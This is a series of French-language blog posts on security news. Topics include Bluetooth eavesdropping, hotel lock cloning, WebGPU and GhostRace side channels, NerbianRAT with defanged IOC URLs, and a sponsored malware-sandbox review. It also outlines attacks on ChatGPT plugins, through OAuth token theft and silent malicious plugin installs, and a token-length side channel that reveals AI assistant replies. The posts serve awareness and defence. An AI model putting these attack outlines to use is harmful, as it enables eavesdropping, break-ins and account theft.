Ça n’arrête plus ! Une faille de sécurité critique dans le protocole Bluetooth permettrait à un utilisateur tiers malveillant d’enregistrer l’audio capté par le microphone d’une enceinte Bluetooth se trouvant à proximité, même si celle-ci est déjà appairée et connectée à un autre appareil. Cette vulnérabilité peut malheureusement conduire à de l’espionnage de conversations privées que ce soit via une enceinte ou un casque. Tant que c’est bluetooth et qu’il y a un micro, ça fonctionne !
Et s’il n’y a pas de micro, cette faille permettrait également jouer ses propres fichiers audio sur vos enceintes sans votre consentement !
Ce problème de sécurité a été découvert et présenté la semaine dernière par Tarlogic lors de la conférence RootedCon 2024 avec en cadeau bonux un PoC (proof of concept) baptisé BlueSpy permettant d’exploiter la faille.
Ce script n’utilise pas de vulnérabilité non corrigée, non, non. Il exploite tout simplement la méthode d’appairage Bluetooth non sécurisée baptisée « Just Work« . C’est d’autant plus effrayant quand on considère le nombre d’enceintes ou de casques vulnérables qui traînent dans les zones résidentielles, les espaces de travail, les salles de réunion, les lieux publics, etc.
Pour sa démonstration, Tarlogic a utilisé un Raspberry Pi 4 sous Kali Linux, contrôlé par un smartphone. Notez que pour étendre la zone de couverture, il est également possible d’utiliser un adaptateur Bluetooth externe avec une antenne externe.
Mais alors, comment se protéger ? La clé de votre tranquilité et de votre sécurité réside dans la visibilité de votre appareil Bluetooth. Si votre enceinte ou casque est visible par d’autres appareils alors qu’il est déjà connecté à votre smartphone, il est vulnérable. Par contre, s’il n’est plus visible une fois appairé, vous êtes à l’abri.
Pour vérifier facilement si vos appareils audio Bluetooth sont vulnérables, vous pouvez utiliser l’application gratuite nRF Connect for Mobile sur un smartphone Android non rooté. Lancez un scan et si l’application détecte et permet de se connecter à votre appareil audio Bluetooth LE, c’est qu’il est probablement vulnérable. À l’inverse, si votre appareil n’apparaît pas dans les résultats du scan alors qu’il est allumé et connecté, vous pouvez souffler.
Malheureusement, si votre appareil autorise une telle connexion, il n’y a pas grand-chose à faire. Certains appareils émettent cependant une notification visuelle ou sonore lorsqu’un autre appareil se connecte, comme un bip, une vibration ou un changement de couleur des LED donc ouvrez l’œil et l’oreille ! Et surtout, éteignez vos appareils Bluetooth quand vous ne les utilisez pas.
Saviez vous que n’importe qui pouvait potentiellement ouvrir votre porte de chambre d’hotel en quelques secondes à peine, grâce à une simple faille de sécurité ? C’est ce qu’ont trouvé des chercheurs sur les serrures d’hôtel de la marque Saflok qui sont hyper répandues.
Ça ressemble à ça d’ailleurs, je suis certain que vous en avez déjà vu. Ce sont celles qui s’ouvrent avec une carte et malheureusement, il y en a des millions installées partout dans le monde.
Les chercheurs Ian Carroll, Lennert Wouters et leur équipe ont donc mis au point une technique baptisée « Unsaflok« , qui combine plusieurs vulnérabilités pour déverrouiller en un clin d’œil ces serrures présentes dans pas moins de 13 000 établissements à travers le monde. En analysant le chiffrement utilisé par le fabricant Dormakaba et le système RFID MIFARE Classic sur lequel reposent les cartes d’accès, ils ont ainsi trouvé le moyen de cloner n’importe quelle carte et d’ouvrir n’importe quelle porte.
Le procédé est d’une déconcertante simplicité : il suffit de récupérer une carte d’accès de l’hôtel ciblé (peu importe la chambre), d’en extraire un code spécifique grâce à un petit appareil à 300$, puis de générer deux nouvelles cartes ou de stocker les codes sur un Flipper Zero. Un premier badge réécrit une partie des données de la serrure, et le second l’ouvre dans la foulée. « Deux petits clics, et la porte s’ouvre« , résume Wouters. « Et ça marche sur absolument toutes les portes de l’hôtel.«
Les détails techniques de cette faille ont été partagés avec Dormakaba en novembre dernier. Depuis, le fabricant s’efforce d’informer ses clients et de déployer des correctifs, qui ne nécessitent heureusement pas de remplacer physiquement toutes les serrures. Une mise à jour logicielle de la réception et une reprogrammation de chaque serrure suffisent dans la plupart des cas. Mais les chercheurs estiment que seuls 36% des verrous Saflok avaient été corrigés en juin, laissant encore des centaines d’établissements vulnérables.
Pour les clients, pas de panique. Carroll et Wouters conseillent de vérifier si votre hôtel est équipé de serrures Saflok (reconnaissables à leur lecteur RFID rond barré d’une ligne ondulée), et le cas échéant, de s’assurer que votre carte est bien au nouveau format MIFARE Plus ou Ultralight EV1 grâce à l’app NFC TagInfo dispo sur Android et iOS. Si ce n’est pas le cas, mieux vaut éviter de laisser des objets de valeur dans la chambre et bien tirer le verrou et la petite chaine lorsque vous y êtes.
Cette affaire rappelle d’ailleurs celle des serrures connectées Onity, dont une faille similaire révélée en 2012 est restée longtemps non corrigée, puisque le fabricant refusait d’assumer le coût du remplacement du matos. Cette brèche de sécurité a d’ailleurs été exploitée par un hacker pour dévaliser des chambres d’hôtel à travers tous les États-Unis…
Allez, si vous me lisez depuis votre chambre d’hôtel, bonne nuit quand même !
Les failles de sécurité dans le code sont le cauchemar des développeurs et des équipes de sécurité et font surtout le régal des hackers. Alors pour y remédier, GitHub a décidé de sortir l’artillerie lourde avec Code Scanning Autofix ! Attention les yeux, cet outil mêle IA et analyse statique et nous fait la promesse de corriger les vulnérabilités en un clin d’œil pendant que vous codez.
Concrètement, Code Scanning Autofix (actuellement en bêta publique) est activé par défaut sur tous les dépôts privés des clients GitHub Advanced Security. Et devinez quoi ? Il gère déjà plus de 90% des types d’alertes pour JavaScript, TypeScript, Java et Python. De quoi mettre une sacrée claque à la dette de sécurité applicative !
En coulisse, cette magie opère grâce à deux technologies de pointe made in GitHub : Copilot pour l’IA et CodeQL pour l’analyse statique. Une fois Code Scanning Autofix activé, il vous propose des correctifs quasi tout cuits qui sont censés régler les deux tiers des vulnérabilités détectées, le tout sans trop d’efforts de votre part.
Voici un exemple de correctif proposé :
Pour chaque faille repérée dans un des langages pris en charge, vous obtenez une explication en langage naturel du correctif suggéré, avec un aperçu du bout de code à valider, modifier ou rejeter. Cela peut inclure des changements dans le fichier en cours, d’autres fichiers, voire des dépendances du projet. Bien entendu, vous gardez le contrôle et pouvez vérifier si le correctif résout bien le problème sans casser la fonctionnalité.
L’intérêt est donc de décharger les experts en sécurité de la fastidieuse traque aux vulnérabilités introduites pendant le développement. Ils pourront alors se concentrer sur la sécurité globale de leur projet.
GitHub promet d’étendre prochainement Code Scanning Autofix à d’autres langages, en commençant par C# et Go. Et pour en savoir plus, foncez sur la doc de GitHub !
Avez-vous déjà cliqué sur un lien posté sur X (Ah, pour une fois que je dis pas « Twitter » ! Je m’améliore !) en pensant atterrir sur un article de Forbes, mais vous vous êtes retrouvés sur un compte Telegram chelou qui parle de crypto ? Ouais, c’est couillon hein… Mais en fait, c’est pas un bug, c’est une sacré faille bien vicieuse !
En gros, quand X génère un aperçu pour un lien externe dans un tweet, il essaie de deviner la destination finale de l’URL. Sauf que des petits malins ont trouvé un moyen de le duper en redirigeant les vrais internautes vers un site différent de celui montré aux robots de X. 🤖
Le truc, c’est que les escrocs utilisent un site intermédiaire qui vérifie si la requête vient d’un navigateur web (donc d’un humain) ou d’un bot. Si c’est un bot, hop, il renvoie vers un article légitime de Forbes. Mais si c’est vous ou moi… Tada ! On se tape une redirection surprise vers un compte Telegram louche !
Le pire, c’est que sur l’app X, impossible de vérifier où mène vraiment un lien avant de cliquer. Alors que sur un navigateur desktop, un ptit survol et hop, l’URL s’affiche. Mais sur mobile, pas moyen ! Tu cliques sur « forbes.com » et tu t’retrouves sur « arnaque-cryptos.ru » en moins de deux.
Bref, méfiance maximale avec les liens postés sur X, surtout depuis un smartphone. C’est la jungle et les arnaqueurs en tout genre sont à l’affût pour vous piéger avec des liens fourbes ! Vérifiez bien l’URL avant de cliquer et évitez carrément les liens sur l’app si vous avez un doute. Ou alors, vous suivez que mon compte Twitter et là, pas de souci ^^.
Vous pensiez que votre GPU était à l’abri des regards indiscrets ? Que nenni damoiseaux zé demoiselles !!!
Une équipe de chercheurs vient de mettre en lumière des failles béantes dans la sécurité de l’API WebGPU, cette technologie qui booste les performances graphiques de nos navigateurs.
D’après cette étude, ces vulnérabilités permettraient à des scripts malveillants d’exploiter les canaux auxiliaires du GPU pour siphonner des données sensibles, comme vos mots de passe ou vos clés de chiffrement. Rien que ça ! 😱 Concrètement, les chercheurs ont réussi à monter ces attaques par canaux auxiliaires en fonction du temps et de l’état du cache du GPU, le tout depuis un simple navigateur web.
En analysant finement l’impact de différentes charges de travail sur les performances du processeur graphique, ils sont parvenus à en déduire des informations sur les autres processus utilisant cette ressource qui est, vous vous en doutez, partagée. Et c’est là qu’est le problème.
Le plus inquiétant, c’est que leur proof of concept se résume à du code JavaScript tout ce qu’il y a de plus basique. Pas besoin d’avoir accès au PC, un site web malveillant peut très bien faire l’affaire. De quoi donner des sueurs froides aux éditeurs de navigateurs… Rassurez-vous, je ne compte pas l’intégrer sur Korben.info, la bouffe n’est pas assez bonne en prison ^^.
Pour l’instant, à part Mozilla qui a publié un bulletin d’avertissement, les principaux acteurs comme Google ou Microsoft n’ont pas réagi. Bouuuuh ! Ils estiment sans doute que le jeu n’en vaut pas la chandelle et préfèrent miser sur les gains de performances de WebGPU plutôt que de s’embarrasser avec des demandes d’autorisations qui gâcheraient l’expérience utilisateur.
Pourtant, les chercheurs sont formels, les sociétés qui conçoivent des navigateurs doivent traiter l’accès au GPU avec la même rigueur que les autres ressources sensibles comme la caméra ou le micro. Sinon, gare aux dérives ! On peut imaginer des utilisateurs qui se font piller leurs cryptomonnaies pendant qu’ils surfent innocemment, ou pire, des fuites de données à grande échelle orchestrées depuis des sites en apparence légitimes.
Avec ça, le bandeau RGPD peut aller se rhabiller ^^/
Rassurez-vous, pour le moment, WebGPU est activé par défaut uniquement dans Chrome et ses dérivés. Pour Firefox, c’est encore seulement dans les versions Nightly (mais ça arrive bientôt). Je vous laisse tester votre navigateur avec le proof of concept dont je vous parlais un peu plus haut.
Bref, cette étude a le mérite de lancer le débat sur les implications sécuritaires des API web de plus en plus intrusives. À l’heure où le GPU s’impose comme une ressource de calcul incontournable, y compris pour des tâches sensibles, la question de son isolation et de la maîtrise des accès devient cruciale.
Bref, on réfléchira à deux fois avant d’autoriser l’accès au GPU sur un site louche… 😉
Vous voulez envoyer des emails chiffrés de bout en bout avec votre client mail favori, mais sans vous prendre la tête ? J’ai ce qu’il vous faut les amis : le projet open source ProtonMail Bridge pour Docker de mon gars sûr DaTux, un fidèle lecteur de Korben.info que je croise souvent sur mon live Twitch.
Ce mec a passé plus de temps à rédiger le README.md de son projet qu’à le coder, mais le résultat est là : une version dockerisée de l’interface en ligne de commande de ProtonMail Bridge qui crée un serveur SMTP local. Comme ça, vos autres conteneurs Docker peuvent envoyer des mails via votre compte ProtonMail. La classe, non ?
Bon par contre, petit bémol : pour l’instant, il faut un compte payant (Mail Plus, Proton Unlimited ou Proton Business) pour se connecter. Ça marchera pas avec les comptes gratuits. Mais vu le niveau de confidentialité et de sécurité que ça apporte à vos échanges d’emails pro, ça les vaut !
Pour commencer, récupérez la dernière image Docker avec :
N’oubliez pas de fournir un volume pour la persistance des données (mkdir /path/to/your/volume/storage).
Maintenant, ouvrez un terminal dans le conteneur en cours d’exécution et utilisez l’interface de commande interactive de ProtonMail Bridge :
docker exec -it protonmail_bridge /bin/bash
À l’intérieur, killez d’abord l’instance de bridge par défaut car une seule peut tourner à la fois :
pkill bridge
Puis connectez-vous à votre compte ProtonMail (rappel : faut un compte payant) :
/app/bridge --cli
Suivez les instructions à l’écran, renseignez votre nom d’utilisateur, mot de passe et code 2FA. Une synchro de votre compte va commencer. Prenez un café en attendant ! Si vous utilisez plusieurs domaines ou adresses email, passez en mode « split » qui va vous permettre de définir des identifiants pour chaque adresse du compte.
Ensuite re-faite ceci pour resynchroniser encore un petit coup :
change mode 0
Quand c’est fini, tapez info pour récupérer les infos de connexion SMTP/IMAP générées par ProtonMail Bridge. Copiez bien l’username ET le mot de passe (différent de celui de votre compte ProtonMail !!). Vous pouvez maintenant configurer votre client mail favori avec ces identifiants, en précisant les ports SMTP 12025 et IMAP 12143 qu’on a exposés au lancement du conteneur Docker.
Et voilà, vous pouvez envoyer des emails chiffrés de bout en bout dans la plus grande des discrétion ! Évidemment, le destinataire devra aussi avoir un compte ProtonMail pour les déchiffrer de son côté.
Pour aller plus loin, j’vous conseille de jeter un œil au README hyper complet de DaTux, avec tous les détails d’install et d’utilisation. Il a même prévu une version optimisée pour tourner sur un serveur TrueNAS Scale, le bienheureux.
En soutien, n’hésitez pas à lui mettre une petite étoile sur son repo GitHub et à partager ce tuto autour de vous !
Vous pensiez que votre infra était bien protégée ? Détrompez-vous les amis, les cyberattaques sont de plus en plus vicieuses et sophistiquées !
J’sais pas si vous utilisez Cloudflare pour sécuriser et optimiser votre site, mais si c’est le cas, vous allez être heureux puisqu’ils ont sorti un nouvel outil pour nous aider à garder nos sites en sécurité: Cloudflare Security Center.
Cette nouvelle fonctionnalité nous permet d’avoir une vision globale de notre surface d’attaque, c’est-à-dire tous les points d’entrée potentiels pour les hackers. On parle des serveurs, des applis, des APIs, bref, tout ce qui est exposé sur le web. Le Security Center scanne tout ça et nous alerte sur les failles de sécurité et les mauvaises configurations qui pourraient nous mettre dans la mouise.
Vous aurez donc besoin :
D’un compte Cloudflare (bah oui sinon ça marche pas)
Au moins un site web sous leur protection (logique)
Passons maintenant à l’activation de la fonctionnalité et le lancement du scan initial
Rendez-vous sur le dashboard de Cloudflare et sélectionnez votre compte.
Foncez ensuite dans « Security Center » > « Security Insights« .
Sous « Enable Security Center scans« , vous avez un bouton magique « Start scan« . Et bien cliquez dessus !
Et patientez… Zzzz.. Le premier scan peut prendre un peu de temps selon la taille de votre site.
Une fois fini, la mention « Scan in Progress » disparaît et laisse place à la date et l’heure du dernier scan. Easy !
Vous verrez alors les problèmes détectés sur votre compte Cloudfalre ainsi que leur sévérité. De mon côté, rien de bien méchant.
Mais attention, c’est pas juste un simple scanner ! L’outil a aussi des fonctionnalités de gestion des risques. Il vous aide à prioriser les problèmes et vous guide pour les résoudre rapidement. Plus besoin de se prendre la tête pendant des heures, on clique sur quelques boutons et hop, c’est réglé !
Ensuite, vous n’aurez rien à gérer puisque Security Center fera des scans régulièrement en fonction de votre forfait. Plus vous avez un plan costaud, plus vos scans seront fréquents.
Ce centre de sécurité propose également un scan de votre infra pour voir tous vos sous-domaines et savoir s’ils sont correctement sécurisés. Et si y’a une adresse IP, un nom de domaine, une URL ou un AS sur laquelle vous avez un doute, vous pouvez même mener une petite enquête dessus
En plus, le Security Center surveille aussi les tentatives d’usurpation d’identité et de phishing. C’est encore en beta, donc j’ai pas pu tester, mais imaginez un peu que des petits malins qui essaient de se faire passer pour votre boîte pour piquer les données de vos clients… Et bien avec Cloudflare qui veille au grain, vous devriez vite les débusquer.
Bref, que vous ayez un petit site vitrine ou une grosse plateforme e-commerce, si vous utilisez Cloudflare, je vous invite à y faire un tour.
Accrochez-vous bien à vos chaises (ou à vos hamacs, je ne juge pas 😉) car des chercheurs en sécurité nous ont encore pondu une nouvelle attaque qui devrait bien faire stresser sur la sécurité de vos CPU !
Oui je sais, on en a déjà vu des vertes et des pas mûres avec Spectre, Meltdown et toute la clique… Mais là, c’est tout aussi lourd. Ça s’appelle GhostRace et ça va vous hanter jusque dans vos cauchemars !
En gros, c’est une variante de Spectre qui arrive à contourner toutes les protections logicielles contre les race conditions. Les mecs de chez IBM et de l’université d’Amsterdam ont donc trouvé un moyen d’exploiter l’exécution spéculative des processeurs (le truc qui leur permet de deviner et d’exécuter les instructions à l’avance) pour court-circuiter les fameux mutex et autres spinlocks qui sont censés empêcher que plusieurs processus accèdent en même temps à une ressource partagée.
Résultat des courses: les attaquants peuvent provoquer des race conditions de manière spéculative et en profiter pour fouiner dans la mémoire et chopper des données sensibles ! C’est vicieux… En plus de ça, l’attaque fonctionne sur tous les processeurs connus (Intel, AMD, ARM, IBM) et sur n’importe quel OS ou hyperviseur qui utilise ce genre de primitives de synchronisation. Donc en gros, personne n’est à l’abri !
Les chercheurs ont même créé un scanner qui leur a permis de trouver plus de 1200 failles potentielles rien que dans le noyau Linux. Et leur PoC arrive à siphonner la mémoire utilisée par le kernel à la vitesse de 12 Ko/s. Bon après, faut quand même un accès local pour exploiter tout ça, mais quand même, ça la fout mal…
Bref, c’est la grosse panique chez les fabricants de CPU et les éditeurs de systèmes qui sont tous en train de se renvoyer la balle façon ping-pong. 🏓 Les premiers disent « mettez à jour vos OS« , les seconds répondent « patchez d’abordvos CPU !« . En attendant, c’est nous qui trinquons hein…
Mais y’a quand même une lueur d’espoir: les chercheurs ont aussi proposé une solution pour « mitiger » le problème. Ça consiste à ajouter des instructions de sérialisation dans toutes les primitives de synchronisation vulnérables. Bon ok, ça a un coût en perfs (5% sur LMBench quand même) mais au moins ça colmate les brèches. Reste plus qu’à convaincre Linus Torvalds et sa bande de l’implémenter maintenant… 😒
En attendant, je vous conseille de garder l’œil sur les mises à jour de sécurité de votre OS et de votre microcode, on sait jamais ! Et si vous voulez en savoir plus sur les dessous techniques de l’attaque, jetez un œil au white paper et au blog des chercheurs, c’est passionnant.
Vous avez entendu parler de ces vulnérabilités dans ChatGPT et ses plugins ?
Ça n’a rien à voir avec l’article précédent, car cette fois c’est Salt Labs qui a découvert le pot aux roses et publié ça dans un article de blog où ils explique comment des affreux pouvaient accéder aux conversations privées des utilisateurs et même à leurs comptes GitHub perso, juste en exploitant des failles dans l’implémentation d’OAuth.
Bon déjà, c’est quoi OAuth ?
C’est un protocole qui permet à une appli d’accéder à vos données sur un autre site sans que vous n’ayez à filer vos identifiants. Hyper pratique mais faut pas se louper dans le code sinon ça part en sucette… Et devinez quoi ? Bah c’est exactement ce qui s’est passé avec certains plugins de ChatGPT !
Salt Labs a trouvé notamment une faille bien vicieuse dans PluginLab, un framework que plein de devs utilisent pour concevoir des plugins. En gros, un attaquant pouvait s’infiltrer dans le compte GitHub d’un utilisateur à son insu grâce au plugin AskTheCode. Comment ? Tout simplement en bidouillant la requête OAuth envoyée par le plugin pour injecter l’ID d’un autre utilisateur au lieu du sien. Vu que PluginLab ne vérifiait pas l’origine des demandes, c’était open bar !
Le pire c’est que cet ID utilisateur, c’était juste le hash SHA-1 de son email. Donc si le hacker connaissait l’email de sa victime, c’était gagné d’avance. Et comme si ça suffisait pas, y’avait carrément un endpoint de l’API PluginLab qui balançait les ID quand on lui envoyait une requête avec une adresse email. Un boulevard pour les cybercriminels !
Une fois qu’il avait chopé le précieux sésame OAuth en se faisant passer pour sa victime, l’attaquant pouvait alors se servir de ChatGPT pour fouiner dans les repos privés GitHub de sa cible. Au menu : liste des projets secrets et accès en lecture aux fichiers confidentiels, le jackpot pour voler du code proprio, des clés d’API ou d’autres données sensibles.
Mais attendez, c’est pas fini ! Salt Labs a déniché deux autres failles bien creepy. La première dans ChatGPT lui-même : un attaquant pouvait créer son propre plugin pourri et le faire valider par ChatGPT sans que l’utilisateur ait son mot à dire. Ensuite en envoyant un lien piégé il installait direct son plugin à la victime qui cliquait dessus. Ni vu ni connu le plugin malveillant aspirait alors les conversations privées sur ChatGPT.
L’autre faille concernait des plugins comme Charts by Kesem AI qui ne vérifiaient pas la destination des tokens OAuth. Du coup un hacker pouvait intercepter le lien d’authentification, mettre son propre domaine dedans et envoyer ça à sa proie. Et bam, quand le pigeon cliquait, le token OAuth partait direct dans la poche du méchant qui pouvait ensuite se servir dans le compte lié sur ChatGPT ! Un vol d’identité en 2 clics…
Bon OK, OpenAI et les dévs ont colmaté les brèches rapidos une fois prévenu par les gentils chercheurs en sécu. Mais ça calme… 😰
Salt Labs compte d’ailleurs balancer bientôt d’autres résultats de recherche flippants sur les failles dans les plugins ChatGPT. Sans parler des menaces encore plus perverses comme le vol de prompts, la manipulation des IA ou la création de malwares et de phishing à la chaîne…
Oh la vache les amis, j’ai une nouvelle de dingue à vous raconter ! Vous savez, on kiffe tous nos IA assistants, genre ChatGPT et compagnie. On leur confie nos pensées les plus intimes, nos secrets les mieux gardés. Que ce soit pour des questions de santé, de couple, de taf… On se dit « pas de soucis, c’est crypté, personne ne pourra lire nos conversations privées » (oui, moi je dis « chiffré », mais vous vous dites « crypté »). Eh ben figurez-vous qu’une bande de joyeux lurons (des chercheurs en cybersécu quoi…) a trouvé une faille de ouf qui permet de déchiffrer les réponses des IA avec une précision hallucinante ! 😱
En gros, ils exploitent un truc qui s’appelle un « canal auxiliaire » (ou « side channel » pour les bilingues). C’est présent dans quasiment toutes les IA, sauf Google Gemini apparemment. Grâce à ça et à des modèles de langage spécialement entraînés, un hacker qui espionne le trafic entre vous et l’IA peut deviner le sujet de 55% des réponses interceptées, souvent au mot près. Et dans 29% des cas, c’est même du 100% correct, mot pour mot. Flippant non ?
Concrètement, imaginez que vous discutiez d’un éventuel divorce avec ChatGPT. Vous recevez une réponse du style : « Oui, il y a plusieurs aspects juridiques importants dont les couples devraient être conscients quand ils envisagent un divorce…bla bla bla » Eh ben le hacker pourra intercepter un truc comme : « Oui, il existe plusieurs considérations légales dont une personne devrait avoir connaissance lorsqu’elle envisage un divorce…«
C’est pas exactement pareil mais le sens est là ! Pareil sur d’autres sujets sensibles. Microsoft, OpenAI et les autres se font vraiment avoir sur ce coup-là… 🙈
En fait cette faille elle vient des « tokens » utilisés par les IA pour générer leurs réponses. Pour vous la faire simple, c’est un peu comme des mots codés que seules les IA comprennent. Le souci c’est que les IA vous envoient souvent ces tokens au fur et à mesure qu’elles créent leur réponse, pour que ce soit plus fluide. Sauf que du coup, même si c’est crypté, ça crée un canal auxiliaire qui fuite des infos sur la longueur et la séquence des tokens… C’est ce que les chercheurs appellent la « séquence de longueurs de tokens ». Celle-là, on l’avait pas vu venir ! 😅
Bon vous allez me dire : c’est quoi un canal auxiliaire exactement ?
Alors c’est un moyen détourné d’obtenir des infos secrètes à partir de trucs anodins qui « fuient » du système. Ça peut être la conso électrique, le temps de traitement, le son, la lumière, les ondes… Bref, tout un tas de signaux physiques auxquels on prête pas attention. Sauf qu’en les analysant bien, des hackers malins arrivent à reconstituer des données sensibles, comme vos mots de passe, le contenu de mémoire chiffrée, des clés de chiffrement… C’est ouf ce qu’on peut faire avec ces techniques !
Après attention hein, faut quand même avoir accès au trafic réseau des victimes. Mais ça peut se faire facilement sur un Wi-Fi public, au taf ou n’importe où en fait. Et hop, on peut espionner vos conversations privées avec les IA sans que vous vous doutiez de rien…
Donc voilà, le message que j’ai envie de faire passer avec cet article c’est : Ne faites pas une confiance aveugle au chiffrement de vos conversations avec les IA ! Ça a l’air sûr comme ça, mais y a toujours des ptits malins qui trouvent des failles auxquelles personne n’avait pensé… La preuve avec ce coup de la « séquence de longueurs de tokens » ! Donc faites gaffe à ce que vous confiez aux ChatGPT et autres Claude, on sait jamais qui pourrait mettre son nez dans vos petits secrets… 😉
Voici une bien mauvaise nouvelle pour les utilisateurs de Linux que nous sommes ! Un malware baptisé NerbianRAT sévit dans la nature depuis au moins 2 ans et il vient juste d’être identifié. Cette saleté est capable de voler vos identifiants en exploitant des failles de sécurité récemment corrigées.
C’est la boîte de sécu Checkpoint Research qui a révélé l’existence de cette variante Linux de NerbianRAT. D’après eux, c’est un groupe de cybercriminels nommé « Magnet Goblin » qui est derrière tout ça. Et leur technique est bien vicieuse : ils exploitent des vulnérabilités à peine patchées (les fameux « 1-day ») en rétro-ingéniérant les mises à jour de sécurité. Comme ça, ils peuvent cibler les machines pas encore à jour. Malin !
En plus de NerbianRAT, Checkpoint a aussi découvert un autre malware appelé MiniNerbian. C’est une version allégée utilisée pour backdoorer les serveurs e-commerce Magento et les transformer en serveurs de commande et contrôle pour le botnet NerbianRAT.
Mais le plus inquiétant c’est que Magnet Goblin est très réactif pour s’accaparer les dernières vulnérabilités 1-day et déployer ses saloperies comme NerbianRAT et MiniNerbian. Ça leur permet d’infecter des machines jusqu’ici épargnés comme les appareils qui se trouvent en périphérie de réseau comme le matériel IoT.
Checkpoint est tombé sur NerbianRAT en analysant les attaques récentes qui exploitent des failles critiques dans Ivanti Secure Connect. Dans le passé, Magnet Goblin a aussi exploité des 1-day dans Magento, Qlink Sense et possiblement Apache ActiveMQ pour propager son malware.
Les chercheurs ont trouvé cette variante Linux de NerbianRAT sur des serveurs compromis contrôlés par Magnet Goblin, avec des URLs du style :
http://94.156.71[.]115/lxrt
http://91.92.240[.]113/aparche2
http://45.9.149[.]215/aparche2
C’est pas tout ! Magnet Goblin déploie aussi une version modifiée d’un autre malware voleur d’infos appelé WarpWire. D’après la boîte Mandiant, cette variante engrange des identifiants VPN qu’elle expédie ensuite sur un serveur du domaine miltonhouse[.]nl.
Contrairement à sa version Windows qui est bien obfusquée, NerbianRAT Linux se protège à peine. Son code contient même des infos de debug qui permettent aux chercheurs de voir des trucs comme les noms de fonctions et de variables. Du beau travail…
Alors les amis linuxiens, méfiance ! Même si on se sent à l’abri avec notre machot, faut bien garder à l’esprit qu’aucun OS n’est invulnérable. La sécurité c’est aussi une histoire de comportement. Pensez à mettre régulièrement à jour vos machines, évitez les sites et les programmes louches, et utilisez vos neurones.
Un petit scan antivirus de temps en temps, ça peut pas faire de mal non plus. Et puis au pire, si vous chopez NerbianRAT, dites-vous que vous aurez participé bien malgré vous à une opération de recherche collaborative via VirusTotal 😉
Je vous laisse méditer là-dessus. En attendant portez-vous bien, pensez à éteindre la lumière en partant et que la Force soit avec vous !
Aujourd’hui, j’aimerais vous parler d’un service qui va modifier totalement la manière dont nous analysons et protégeons nos systèmes contre les menaces informatiques et plus particulièrement contre les attaques de phishing et les malwares qui en découlent.
Il s’agit d’ANY.RUN, un outil basé sur le cloud qui permet d’analyser sans prendre de risque et sans prise de tête, tous types de malwares présents sous Windows ou Linux. Vous l’aurez compris, ce service est d’abord conçu pour aider les chercheurs en sécurité, mais également les équipes SOC (Security Operations Center) et DFIR (Digital forensics and incident response) à examiner en détail les menaces qu’ils détectent, mais également simuler différents scénarios et ainsi obtenir des tonnes d’infos sur le comportement de ces logiciels malveillants.
Pour rappel, un malware est un logiciel malveillant capable de s’infiltrer sur votre ordinateur, et dont le seul but est de vous nuire en vous voulant des données, en vous extorquant de l’argent, en endommageant votre système ou en exploitant votre machine au travers d’un botnet. Sous Windows, ces menaces sont particulièrement virulentes, exploitant la plupart du temps des vulnérabilités du système ou les comportements imprudents des utilisateurs. Mais je ne vous apprends rien en vous disant qu’un simple clic sur un lien dans un email de phishing peut suffire à déployer par exemple un ransomware qui chiffrera alors l’ensemble de vos fichiers et exigera une rançon (en cryptomonnaie ^^) pour les récupérer.
Contrairement à d’autres outils plus basiques comme VirusTotal, ANY.RUN propose un environnement en vase clos où chaque malware peut être exécuté sans risque, comme s’il se déployait sur un véritable système. Cette approche permet aux utilisateurs d’observer en temps réel les actions du malware : De la création de nouveaux processus et l’arrivée de fichiers malveillants jusqu’aux tentatives de connexion à des URL douteuses. Tout ce qui se passe dans le système infecté, y compris les modifications apportées à la base de registre et les communications réseau, est relevé de manière transparente.
Linux étant au cœur des infrastructures informatiques des entreprises et des organisations, il représente également une cible de choix pour les cybercriminels, ce qui se confirme puisque des chercheurs d’IBM ont noté sur 2020, une hausse de 40 % des malwares ciblant spécifiquement Linux. C’est pourquoi ANY.RUN propose en plus de sa sandbox Windows, un environnement basé sur Ubuntu.
Les outils d’audit fournis par ce service permettent également de générer des rapports contenant tout ce qu’il y a à retenir de votre analyse de malware. Je parle bien sûr de vidéos, de captures d’écran, de hash de fichiers, ainsi que toutes les données accumulées durant l’exécution de la tâche.
Comme vous pouvez le voir sur les captures écran, ANY.RUN supporte les dernières versions de tous les navigateurs et systèmes d’exploitation populaires. La plupart des signatures de logiciels malveillants produites par ANY.RUN sont également poussées vers la base ATT&CK de Mitre et sont présentées de manière visuelle et pratique, ce qui permet de former les nouveaux chasseurs de malwares.
Si vous voulez analyser une nouvelle menace potentielle, pas de problème avec ANY.RUN. Il vous suffit d’uploader un fichier ou d’utiliser une URL pour lancer l’analyse dans un environnement Windows de la version de votre choix. Vous pourrez alors ajuster la durée de l’exécution, et simuler des interactions réseaux via un proxy HTTPS ou router le réseau via un VPN/Proxy/Tor. La plateforme propose également plusieurs applications et outils préinstallés pour imiter un environnement utilisateur réel. Les paramètres de confidentialité et de conservation de la tâche sont facilement spécifiables et des fonctionnalités avancées comme l’interactivité automatisée ou l’accès à ChatGPT viendront enrichir encore plus l’analyse.
L’outil affiche le schéma d’attaque du malware dans une structure arborescente interactive, vous permettant de voir en un clin d’œil les principaux processus lancés. Ensuite, toutes les données collectées au travers de cette sandbox peuvent être rejouées autant de fois qu’on le souhaite pour des analyses futures ou tout simplement générer des rapports. Bien sûr, tout est exportable et partageable, ce qui vous permettra de travailler à plusieurs sur une menace.
Dans cet exemple d’un malware en pleine action, celui-ci cherche à s’ancrer dans le système par des modifications du registre Windows, signe d’une tentative de persistance. Il exécute également un fichier batch suspect qui pourrait déployer d’autres composants nuisibles. Il utilise également la commande vssadmin.exe pour effacer les points de restauration du système. C’est une technique typique des ransomwares pour empêcher toute récupération de données après une attaque. Vous voyez, on en apprend beaucoup avec ANY.RUN.
Au-delà des possibilités d’analyse temps réel des malwares, l’intégration poussée de la Threat Intelligence (TI) au sein d’Any Run est également à souligner. Cela se matérialise au travers d’une base de renseignement sur les menaces qui est constamment enrichie par une communauté internationale de chercheurs. Cela permet de collecter et d’analyser les malwares dès qu’ils pointent le bout de leur nez. Les indicateurs de compromission (IOC) sont alors connus, ce qui offre un gros avantage pour la suite. D’ailleurs si vous voulez vous abonner, Any run vous offre gratuitement 50 options TI en passant par ce lien.
On y retrouve dans un flux JSON / STIX ou via le site web, tous les événements liés au malware, les adresses IP, les domaines utilisés, les hash de fichiers…etc. Comme ça, les équipes SOC sont à jour sur les menaces et leurs IOC et peuvent réagir beaucoup plus vite.
